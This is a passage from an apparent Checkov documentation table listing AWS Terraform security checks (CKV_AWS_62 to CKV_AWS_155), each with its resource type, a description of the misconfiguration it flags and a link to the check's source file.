aws_iam_user_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) | +| 129 | CKV_AWS_62 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) | +| 130 | CKV_AWS_63 | resource | aws_iam_group_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) | +| 131 | CKV_AWS_63 | resource | aws_iam_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) | +| 132 | CKV_AWS_63 | resource | aws_iam_role_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) | +| 133 | CKV_AWS_63 | resource | aws_iam_user_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) | +| 134 | CKV_AWS_63 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) | +| 135 | CKV_AWS_64 | resource | aws_redshift_cluster | Ensure all data stored in the Redshift cluster is securely encrypted at rest | Terraform | [RedshiftClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterEncryption.py) | +| 136 | CKV_AWS_65 | resource | aws_ecs_cluster | Ensure container insights are enabled on ECS cluster | Terraform | [ECSClusterContainerInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterContainerInsights.py) | +| 137 | CKV_AWS_66 | resource | aws_cloudwatch_log_group | Ensure that CloudWatch Log Group specifies retention days | Terraform | [CloudWatchLogGroupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupRetention.py) | +| 138 | CKV_AWS_67 | resource | aws_cloudtrail | Ensure CloudTrail is enabled in all Regions | Terraform | [CloudtrailMultiRegion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailMultiRegion.py) | +| 139 | CKV_AWS_68 | resource | aws_cloudfront_distribution | CloudFront Distribution should have WAF enabled | Terraform | [WAFEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFEnabled.py) | +| 140 | CKV_AWS_69 | resource | aws_mq_broker | Ensure MQ Broker is not publicly exposed | Terraform | [MQBrokerNotPubliclyExposed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerNotPubliclyExposed.py) | +| 141 | CKV_AWS_70 | resource | aws_s3_bucket | Ensure S3 bucket does not allow an action with any Principal | Terraform | [S3AllowsAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py) | +| 142 | CKV_AWS_70 | resource | aws_s3_bucket_policy | Ensure S3 bucket does not allow an action with any Principal | Terraform | [S3AllowsAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py) | +| 143 | CKV_AWS_71 | resource | aws_redshift_cluster | Ensure Redshift Cluster logging is enabled | Terraform | [RedshiftClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterLogging.py) | +| 144 | CKV_AWS_72 | resource | aws_sqs_queue_policy | Ensure SQS policy does not allow ALL (*) actions. | Terraform | [SQSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSPolicy.py) | +| 145 | CKV_AWS_73 | resource | aws_api_gateway_stage | Ensure API Gateway has X-Ray Tracing enabled | Terraform | [APIGatewayXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayXray.py) | +| 146 | CKV_AWS_74 | resource | aws_docdb_cluster | Ensure DocumentDB is encrypted at rest (default is unencrypted) | Terraform | [DocDBEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBEncryption.py) | +| 147 | CKV_AWS_75 | resource | aws_globalaccelerator_accelerator | Ensure Global Accelerator accelerator has flow logs enabled | Terraform | [GlobalAcceleratorAcceleratorFlowLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlobalAcceleratorAcceleratorFlowLogs.py) | +| 148 | CKV_AWS_76 | resource | aws_api_gateway_stage | Ensure API Gateway has Access Logging enabled | Terraform | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAccessLogging.py) | +| 149 | CKV_AWS_76 | resource | aws_apigatewayv2_stage | Ensure API Gateway has Access Logging enabled | Terraform | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAccessLogging.py) | +| 150 | CKV_AWS_77 | resource | aws_athena_database | Ensure Athena Database is encrypted at rest (default is unencrypted) | Terraform | [AthenaDatabaseEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaDatabaseEncryption.py) | +| 151 | CKV_AWS_78 | resource | aws_codebuild_project | Ensure that CodeBuild Project encryption is not disabled | Terraform | [CodeBuildProjectEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeBuildProjectEncryption.py) | +| 152 | CKV_AWS_79 | resource | aws_instance | Ensure Instance Metadata Service Version 1 is not enabled | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py) | +| 153 | CKV_AWS_79 | resource | aws_launch_configuration | Ensure Instance Metadata Service Version 1 is not enabled | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py) | +| 154 | CKV_AWS_79 | resource | aws_launch_template | Ensure Instance Metadata Service Version 1 is not enabled | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py) | +| 155 | CKV_AWS_80 | resource | aws_msk_cluster | Ensure MSK Cluster logging is enabled | Terraform | [MSKClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterLogging.py) | +| 156 | CKV_AWS_81 | resource | aws_msk_cluster | Ensure MSK Cluster encryption in rest and transit is enabled | Terraform | [MSKClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterEncryption.py) | +| 157 | CKV_AWS_82 | resource | aws_athena_workgroup | Ensure Athena Workgroup should enforce configuration to prevent client disabling encryption | Terraform | [AthenaWorkgroupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaWorkgroupConfiguration.py) | +| 158 | CKV_AWS_83 | resource | aws_elasticsearch_domain | Ensure Elasticsearch Domain enforces HTTPS | Terraform | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py) | +| 159 | CKV_AWS_83 | resource | aws_opensearch_domain | Ensure Elasticsearch Domain enforces HTTPS | Terraform | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py) | +| 160 | CKV_AWS_84 | resource | aws_elasticsearch_domain | Ensure Elasticsearch Domain Logging is enabled | Terraform | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainLogging.py) | +| 161 | CKV_AWS_84 | resource | aws_opensearch_domain | Ensure Elasticsearch Domain Logging is enabled | Terraform | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainLogging.py) | +| 162 | CKV_AWS_85 | resource | aws_docdb_cluster | Ensure DocumentDB Logging is enabled | Terraform | [DocDBLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBLogging.py) | +| 163 | CKV_AWS_86 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution has Access Logging enabled | Terraform | [CloudfrontDistributionLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionLogging.py) | +| 164 | CKV_AWS_87 | resource | aws_redshift_cluster | Redshift cluster should not be publicly accessible | Terraform | [RedshitClusterPubliclyAvailable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshitClusterPubliclyAvailable.py) | +| 165 | CKV_AWS_88 | resource | aws_instance | EC2 instance should not have public IP. | Terraform | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2PublicIP.py) | +| 166 | CKV_AWS_88 | resource | aws_launch_template | EC2 instance should not have public IP. | Terraform | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2PublicIP.py) | +| 167 | CKV_AWS_89 | resource | aws_dms_replication_instance | DMS replication instance should not be publicly accessible | Terraform | [DMSReplicationInstancePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstancePubliclyAccessible.py) | +| 168 | CKV_AWS_90 | resource | aws_docdb_cluster_parameter_group | Ensure DocumentDB TLS is not disabled | Terraform | [DocDBTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBTLS.py) | +| 169 | CKV_AWS_91 | resource | aws_alb | Ensure the ELBv2 (Application/Network) has access logging enabled | Terraform | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBv2AccessLogs.py) | +| 170 | CKV_AWS_91 | resource | aws_lb | Ensure the ELBv2 (Application/Network) has access logging enabled | Terraform | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBv2AccessLogs.py) | +| 171 | CKV_AWS_92 | resource | aws_elb | Ensure the ELB has access logging enabled | Terraform | [ELBAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBAccessLogs.py) | +| 172 | CKV_AWS_93 | resource | aws_s3_bucket | Ensure S3 bucket policy does not lockout all but root user. (Prevent lockouts needing root account fixes) | Terraform | [S3ProtectAgainstPolicyLockout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ProtectAgainstPolicyLockout.py) | +| 173 | CKV_AWS_93 | resource | aws_s3_bucket_policy | Ensure S3 bucket policy does not lockout all but root user. (Prevent lockouts needing root account fixes) | Terraform | [S3ProtectAgainstPolicyLockout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ProtectAgainstPolicyLockout.py) | +| 174 | CKV_AWS_94 | resource | aws_glue_data_catalog_encryption_settings | Ensure Glue Data Catalog Encryption is enabled | Terraform | [GlueDataCatalogEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueDataCatalogEncryption.py) | +| 175 | CKV_AWS_96 | resource | aws_rds_cluster | Ensure all data stored in Aurora is securely encrypted at rest | Terraform | [AuroraEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AuroraEncryption.py) | +| 176 | CKV_AWS_97 | resource | aws_ecs_task_definition | Ensure Encryption in transit is enabled for EFS volumes in ECS Task definitions | Terraform | [ECSTaskDefinitionEFSVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSTaskDefinitionEFSVolumeEncryption.py) | +| 177 | CKV_AWS_98 | resource | aws_sagemaker_endpoint_configuration | Ensure all data stored in the Sagemaker Endpoint is securely encrypted at rest | Terraform | [SagemakerEndpointConfigurationEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerEndpointConfigurationEncryption.py) | +| 178 | CKV_AWS_99 | resource | aws_glue_security_configuration | Ensure Glue Security Configuration Encryption is enabled | Terraform | [GlueSecurityConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfiguration.py) | +| 179 | CKV_AWS_100 | resource | aws_eks_node_group | Ensure AWS EKS node group does not have implicit SSH access from 0.0.0.0/0 | Terraform | [EKSNodeGroupRemoteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSNodeGroupRemoteAccess.py) | +| 180 | CKV_AWS_101 | resource | aws_neptune_cluster | Ensure Neptune logging is enabled | Terraform | [NeptuneClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterLogging.py) | +| 181 | CKV_AWS_102 | resource | aws_neptune_cluster_instance | Ensure Neptune Cluster instance is not publicly available | Terraform | [NeptuneClusterInstancePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterInstancePublic.py) | +| 182 | CKV_AWS_103 | resource | aws_alb_listener | Ensure that load balancer is using at least TLS 1.2 | Terraform | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml) | +| 183 | CKV_AWS_103 | resource | aws_lb | Ensure that load balancer is using at least TLS 1.2 | Terraform | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml) | +| 184 | CKV_AWS_103 | resource | aws_lb_listener | Ensure that load balancer is using at least TLS 1.2 | Terraform | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml) | +| 185 | CKV_AWS_104 | resource | aws_docdb_cluster_parameter_group | Ensure DocumentDB has audit logs enabled | Terraform | [DocDBAuditLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBAuditLogs.py) | +| 186 | CKV_AWS_105 | resource | aws_redshift_parameter_group | Ensure Redshift uses SSL | Terraform | [RedShiftSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedShiftSSL.py) | +| 187 | CKV_AWS_106 | resource | aws_ebs_encryption_by_default | Ensure EBS default encryption is enabled | Terraform | [EBSDefaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSDefaultEncryption.py) | +| 188 | CKV_AWS_107 | data | aws_iam_policy_document | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMCredentialsExposure.py) | +| 189 | CKV_AWS_108 | data | aws_iam_policy_document | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMDataExfiltration.py) | +| 190 | CKV_AWS_109 | data | aws_iam_policy_document | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPermissionsManagement.py) | +| 191 | CKV_AWS_110 | data | aws_iam_policy_document | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPrivilegeEscalation.py) | +| 192 | CKV_AWS_111 | data | aws_iam_policy_document | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMWriteAccess.py) | +| 193 | CKV_AWS_112 | resource | aws_ssm_document | Ensure Session Manager data is encrypted in transit | Terraform | [SSMSessionManagerDocumentEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentEncryption.py) | +| 194 | CKV_AWS_113 | resource | aws_ssm_document | Ensure Session Manager logs are enabled and encrypted | Terraform | [SSMSessionManagerDocumentLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentLogging.py) | +| 195 | CKV_AWS_114 | resource | aws_emr_cluster | Ensure that EMR clusters with Kerberos have Kerberos Realm set | Terraform | [EMRClusterKerberosAttributes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterKerberosAttributes.py) | +| 196 | CKV_AWS_115 | resource | aws_lambda_function | Ensure that AWS Lambda function is configured for function-level concurrent execution limit | Terraform | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py) | +| 197 | CKV_AWS_116 | resource | aws_lambda_function | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ) | Terraform | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaDLQConfigured.py) | +| 198 | CKV_AWS_117 | resource | aws_lambda_function | Ensure that AWS Lambda function is configured inside a VPC | Terraform | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaInVPC.py) | +| 199 | CKV_AWS_118 | resource | aws_db_instance | Ensure that enhanced monitoring is enabled for Amazon RDS instances | Terraform | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEnhancedMonitorEnabled.py) | +| 200 | CKV_AWS_118 | resource | aws_rds_cluster_instance | Ensure that enhanced monitoring is enabled for Amazon RDS instances | Terraform | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEnhancedMonitorEnabled.py) | +| 201 | CKV_AWS_119 | resource | aws_dynamodb_table | Ensure DynamoDB Tables are encrypted using a KMS Customer Managed CMK | Terraform | [DynamoDBTablesEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBTablesEncrypted.py) | +| 202 | CKV_AWS_120 | resource | aws_api_gateway_stage | Ensure API Gateway caching is enabled | Terraform | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayCacheEnable.py) | +| 203 | CKV_AWS_121 | resource | aws_config_configuration_aggregator | Ensure AWS Config is enabled in all regions | Terraform | [ConfigConfgurationAggregatorAllRegions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConfigConfgurationAggregatorAllRegions.py) | +| 204 | CKV_AWS_122 | resource | aws_sagemaker_notebook_instance | Ensure that direct internet access is disabled for an Amazon SageMaker Notebook Instance | Terraform | [SageMakerInternetAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SageMakerInternetAccessDisabled.py) | +| 205 | CKV_AWS_123 | resource | aws_vpc_endpoint_service | Ensure that VPC Endpoint Service is configured for Manual Acceptance | Terraform | [VPCEndpointAcceptanceConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/VPCEndpointAcceptanceConfigured.py) | +| 206 | CKV_AWS_124 | resource | aws_cloudformation_stack | Ensure that CloudFormation stacks are sending event notifications to an SNS topic | Terraform | [CloudformationStackNotificationArns.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudformationStackNotificationArns.py) | +| 207 | CKV_AWS_126 | resource | aws_instance | Ensure that detailed monitoring is enabled for EC2 instances | Terraform | [EC2DetailedMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2DetailedMonitoringEnabled.py) | +| 208 | CKV_AWS_127 | resource | aws_elb | Ensure that Elastic Load Balancer(s) uses SSL certificates provided by AWS Certificate Manager | Terraform | [ELBUsesSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBUsesSSL.py) | +| 209 | CKV_AWS_129 | resource | aws_db_instance | Ensure that respective logs of Amazon Relational Database Service (Amazon RDS) are enabled | Terraform | [DBInstanceLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceLogging.py) | +| 210 | CKV_AWS_130 | resource | aws_subnet | Ensure VPC subnets do not assign public IP by default | Terraform | [SubnetPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SubnetPublicIP.py) | +| 211 | CKV_AWS_131 | resource | aws_alb | Ensure that ALB drops HTTP headers | Terraform | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDropHttpHeaders.py) | +| 212 | CKV_AWS_131 | resource | aws_lb | Ensure that ALB drops HTTP headers | Terraform | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDropHttpHeaders.py) | +| 213 | CKV_AWS_133 | resource | aws_db_instance | Ensure that RDS instances has backup policy | Terraform | [DBInstanceBackupRetentionPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceBackupRetentionPeriod.py) | +| 214 | CKV_AWS_133 | resource | aws_rds_cluster | Ensure that RDS instances has backup policy | Terraform | [DBInstanceBackupRetentionPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceBackupRetentionPeriod.py) | +| 215 | CKV_AWS_134 | resource | aws_elasticache_cluster | Ensure that Amazon ElastiCache Redis clusters have automatic backup turned on | Terraform | [ElasticCacheAutomaticBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticCacheAutomaticBackup.py) | +| 216 | CKV_AWS_135 | resource | aws_instance | Ensure that EC2 is EBS optimized | Terraform | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2EBSOptimized.py) | +| 217 | CKV_AWS_136 | resource | aws_ecr_repository | Ensure that ECR repositories are encrypted using KMS | Terraform | [ECRRepositoryEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRRepositoryEncrypted.py) | +| 218 | CKV_AWS_137 | resource | aws_elasticsearch_domain | Ensure that Elasticsearch is configured inside a VPC | Terraform | [ElasticsearchInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchInVPC.py) | +| 219 | CKV_AWS_137 | resource | aws_opensearch_domain | Ensure that Elasticsearch is configured inside a VPC | Terraform | [ElasticsearchInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchInVPC.py) | +| 220 | CKV_AWS_138 | resource | aws_elb | Ensure that ELB is cross-zone-load-balancing enabled | Terraform | [ELBCrossZoneEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBCrossZoneEnable.py) | +| 221 | CKV_AWS_139 | resource | aws_rds_cluster | Ensure that RDS clusters have deletion protection enabled | Terraform | [RDSDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSDeletionProtection.py) | +| 222 | CKV_AWS_140 | resource | aws_rds_global_cluster | Ensure that RDS global clusters are encrypted | Terraform | [RDSClusterEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterEncrypted.py) | +| 223 | CKV_AWS_141 | resource | aws_redshift_cluster | Ensured that Redshift cluster allowing version upgrade by default | Terraform | [RedshiftClusterAllowVersionUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterAllowVersionUpgrade.py) | +| 224 | CKV_AWS_142 | resource | aws_redshift_cluster | Ensure that Redshift cluster is encrypted by KMS | Terraform | [RedshiftClusterKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterKMSKey.py) | +| 225 | CKV_AWS_143 | resource | aws_s3_bucket | Ensure that S3 bucket has lock configuration enabled by default | Terraform | [S3BucketObjectLock.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BucketObjectLock.py) | +| 226 | CKV_AWS_144 | resource | aws_s3_bucket | Ensure that S3 bucket has cross-region replication enabled | Terraform | [S3BucketReplicationConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketReplicationConfiguration.yaml) | +| 227 | CKV_AWS_144 | resource | aws_s3_bucket_replication_configuration | Ensure that S3 bucket has cross-region replication enabled | Terraform | [S3BucketReplicationConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketReplicationConfiguration.yaml) | +| 228 | CKV_AWS_145 | resource | aws_s3_bucket | Ensure that S3 buckets are encrypted with KMS by default | Terraform | [S3KMSEncryptedByDefault.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3KMSEncryptedByDefault.yaml) | +| 229 | CKV_AWS_145 | resource | aws_s3_bucket_server_side_encryption_configuration | Ensure that S3 buckets are encrypted with KMS by default | Terraform | [S3KMSEncryptedByDefault.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3KMSEncryptedByDefault.yaml) | +| 230 | CKV_AWS_146 | resource | aws_db_cluster_snapshot | Ensure that RDS database cluster snapshot is encrypted | Terraform | [RDSClusterSnapshotEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterSnapshotEncrypted.py) | +| 231 | CKV_AWS_147 | resource | aws_codebuild_project | Ensure that CodeBuild projects are encrypted using CMK | Terraform | [CodebuildUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildUsesCMK.py) | +| 232 | CKV_AWS_148 | resource | aws_default_vpc | Ensure no default VPC is planned to be provisioned | Terraform | [VPCDefaultNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/VPCDefaultNetwork.py) | +| 233 | CKV_AWS_149 | resource | aws_secretsmanager_secret | Ensure that Secrets Manager secret is encrypted using KMS CMK | Terraform | [SecretManagerSecretEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecretManagerSecretEncrypted.py) | +| 234 | CKV_AWS_150 | resource | aws_alb | Ensure that Load Balancer has deletion protection enabled | Terraform | [LBDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBDeletionProtection.py) | +| 235 | CKV_AWS_150 | resource | aws_lb | Ensure that Load Balancer has deletion protection enabled | Terraform | [LBDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBDeletionProtection.py) | +| 236 | CKV_AWS_152 | resource | aws_alb | Ensure that Load Balancer (Network/Gateway) has cross-zone load balancing enabled | Terraform | [LBCrossZone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBCrossZone.py) | +| 237 | CKV_AWS_152 | resource | aws_lb | Ensure that Load Balancer (Network/Gateway) has cross-zone load balancing enabled | Terraform | [LBCrossZone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBCrossZone.py) | +| 238 | CKV_AWS_153 | resource | aws_autoscaling_group | Autoscaling groups should supply tags to launch configurations | Terraform | [AutoScalingTagging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AutoScalingTagging.py) | +| 239 | CKV_AWS_154 | resource | aws_redshift_cluster | Ensure Redshift is not deployed outside of a VPC | Terraform | [RedshiftInEc2ClassicMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftInEc2ClassicMode.py) | +| 240 | CKV_AWS_155 | resource | aws_workspaces_workspace | Ensure that Workspace user volumes are encrypted | Terraform | 